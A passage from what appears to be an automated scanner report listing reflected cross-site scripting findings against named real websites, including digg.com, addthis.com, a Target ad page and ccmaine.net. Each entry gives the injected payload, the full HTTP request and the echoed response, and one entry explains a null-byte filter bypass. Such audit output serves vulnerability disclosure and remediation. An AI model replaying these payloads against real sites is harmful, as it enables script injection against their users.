Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Wed, 12 Jan 2011 13:01:42 GMT
Last-Modified: Wed, 12 Jan 2011 13:01:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base9a9a7<a>1c64490ce0a/</h1>
...[SNIP]...

3.5. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 918b2"><script>alert(1)</script>616252d6220 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 918b2\"><script>alert(1)</script>616252d6220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?918b2"><script>alert(1)</script>616252d6220=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:33 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Wed, 12 Jan 2011 13:01:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 175876

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?918b2\"><script>alert(1)</script>616252d6220=1#preview" method="post">
...[SNIP]...

3.6. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0025151"><script>alert(1)</script>c59d926219b was submitted in the REST URL parameter 1. This input was echoed as 25151"><script>alert(1)</script>c59d926219b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0025151"><script>alert(1)</script>c59d926219b HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:35:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1454381204777206016%3A154; expires=Thu, 13-Jan-2011 03:35:54 GMT; path=/; domain=digg.com
Set-Cookie: d=1f4f310684a402462325f78fa39217daa6358c237c9a72072efdd2119627f692; expires=Mon, 11-Jan-2021 13:43:34 GMT; path=/; domain=.digg.com
X-Digg-Time: D=193681 10.2.130.24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15324

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0025151"><script>alert(1)</script>c59d926219b.rss">
...[SNIP]...

3.7. http://flowplayer.org/tools/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ac8"><img%20src%3da%20onerror%3dalert(1)>9fe1b257a49 was submitted in the REST URL parameter 1. This input was echoed as b7ac8"><img src=a onerror=alert(1)>9fe1b257a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolsb7ac8"><img%20src%3da%20onerror%3dalert(1)>9fe1b257a49/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 12 Jan 2011 13:02:25 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Cache-control: private
Content-Length: 5920


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsb7ac8"><img src=a onerror=alert(1)>9fe1b257a49" class="msie tools">
...[SNIP]...

3.8. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99448'-alert(1)-'d32d8b2c2a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-log-analysis-sm99448'-alert(1)-'d32d8b2c2a0/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:47:03 GMT
Server: TornadoServer/1.0
Content-Length: 2200
Connection: Close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oops (Error 404) - Performable</title>
<style type="text/css">
body {
font-family:"Lucida Gra
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-10161796-3']);
_gaq.push(['_trackPageview', '/errors/landesm.gfi.com/404/event-log-analysis-sm99448'-alert(1)-'d32d8b2c2a0/']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-
...[SNIP]...

3.9. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e322<a>bbfd21a913a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?7e322<a>bbfd21a913a=1 HTTP/1.1
Host: mads.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:48:35 GMT
Server: Apache/2.2
Content-Length: 353
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=756
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 12 Jan 2011 03:48:35 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="7e322<a>bbfd21a913a=1" _REQ_NUM="0" --><!-- MAC-AD STATUS: COULD NOT MAP BRAND=&quot;&quot; SITE=&quot;&quot; NCAT=&quot;&quot; PTNR=&quot;2&quot; TO MA
...[SNIP]...

3.10. http://weeklyad.target.com/target/default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weeklyad.target.com
Path:   /target/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e73d"-alert(1)-"5a488d4c1ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /target/default.aspx?4e73d"-alert(1)-"5a488d4c1ea=1 HTTP/1.1
Host: weeklyad.target.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Cache-Control: private, max-age=0
Expires: Wed, 12 Jan 2011 04:17:13 GMT
Date: Wed, 12 Jan 2011 04:17:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<html lang
...[SNIP]...
om";
var sl_basedir = "target";
var sl_moviepath = "flash/target/target?ver=090326";
var sl_campaignId = "a4776711305a3c4b";
var sl_querystring = "action=entryflash&4e73d"-alert(1)-"5a488d4c1ea=1";
var sl_usedByIframe = false;
var sl_action = "entryflash";
var sl_fullscreenQS = "4e73d"-alert(1)-"5a488d4c1ea=1";
var sl_sweepstakes = "false";
</script>
...[SNIP]...

3.11. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d881a<script>alert(1)</script>eb1d0c27278 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpd881a<script>alert(1)</script>eb1d0c27278 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 12 Jan 2011 04:19:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3pg3je3annhr4isubu49p9srm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpd881a<script>alert(1)</script>eb1d0c27278</strong>
...[SNIP]...

3.12. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b72"-alert(1)-"9394725b754 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpc1b72"-alert(1)-"9394725b754 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 12 Jan 2011 04:19:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rs4f354lgh6a3mh8li873raet1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpc1b72"-alert(1)-"9394725b754";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.13. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a1a"-alert(1)-"c8ee54f2b37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/20a1a"-alert(1)-"c8ee54f2b37 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/20a1a"-alert(1)-"c8ee54f2b37";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.14. http://www.ccmaine.net/AboutUs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /AboutUs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2d8"><img%20src%3da%20onerror%3dalert(1)>d72d4ce88ea was submitted in the REST URL parameter 1. This input was echoed as 4f2d8"><img src=a onerror=alert(1)>d72d4ce88ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /AboutUs4f2d8"><img%20src%3da%20onerror%3dalert(1)>d72d4ce88ea HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:27 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: d32bdc983db958f343551d76ca24711c
Content-Length: 3267
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for AboutUs4f2d8"><img src=a onerror=alert(1)>d72d4ce88ea (RSS)" href="http://www.ccmaine.net/AboutUs4f2d8">
...[SNIP]...

3.15. http://www.ccmaine.net/AboutUs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /AboutUs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5fc4<img%20src%3da%20onerror%3dalert(1)>48948eeca42 was submitted in the REST URL parameter 1. This input was echoed as b5fc4<img src=a onerror=alert(1)>48948eeca42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /AboutUsb5fc4<img%20src%3da%20onerror%3dalert(1)>48948eeca42 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:25 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: e9e010a376fd609f56f2d58330844155
Content-Length: 3256
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : AboutUsb5fc4<img src=a onerror=alert(1)>48948eeca42</h2>
...[SNIP]...

3.16. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /BillingPolicy

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3295c"><img%20src%3da%20onerror%3dalert(1)>e19de808de7 was submitted in the REST URL parameter 1. This input was echoed as 3295c"><img src=a onerror=alert(1)>e19de808de7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /BillingPolicy3295c"><img%20src%3da%20onerror%3dalert(1)>e19de808de7 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:42 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 6629376caca2d486b9c0b94d4f7b4371
Content-Length: 3304
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for BillingPolicy3295c"><img src=a onerror=alert(1)>e19de808de7 (RSS)" href="http://www.ccmaine.net/BillingPolicy3295c">
...[SNIP]...

3.17. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /BillingPolicy

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc613<img%20src%3da%20onerror%3dalert(1)>3347e2cf2c2 was submitted in the REST URL parameter 1. This input was echoed as dc613<img src=a onerror=alert(1)>3347e2cf2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /BillingPolicydc613<img%20src%3da%20onerror%3dalert(1)>3347e2cf2c2 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:59 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 25e80420e6d313e4fbe6ce792e29fa76
Content-Length: 3291
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : BillingPolicydc613<img src=a onerror=alert(1)>3347e2cf2c2</h2>
...[SNIP]...

3.18. http://www.ccmaine.net/ContactUs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ContactUs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34738"><img%20src%3da%20onerror%3dalert(1)>df6b78b1cd3 was submitted in the REST URL parameter 1. This input was echoed as 34738"><img src=a onerror=alert(1)>df6b78b1cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ContactUs34738"><img%20src%3da%20onerror%3dalert(1)>df6b78b1cd3 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 3c7274efcc40f20baab312a1024e600f
Content-Length: 3279
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ContactUs34738"><img src=a onerror=alert(1)>df6b78b1cd3 (RSS)" href="http://www.ccmaine.net/ContactUs34738">
...[SNIP]...

3.19. http://www.ccmaine.net/ContactUs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ContactUs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 516ec<img%20src%3da%20onerror%3dalert(1)>286ed71c31f was submitted in the REST URL parameter 1. This input was echoed as 516ec<img src=a onerror=alert(1)>286ed71c31f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ContactUs516ec<img%20src%3da%20onerror%3dalert(1)>286ed71c31f HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:59 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: ec91a7e91eec3db7c10f0659d756670f
Content-Length: 3267
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : ContactUs516ec<img src=a onerror=alert(1)>286ed71c31f</h2>
...[SNIP]...

3.20. http://www.ccmaine.net/HomePage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /HomePage

Issue detail

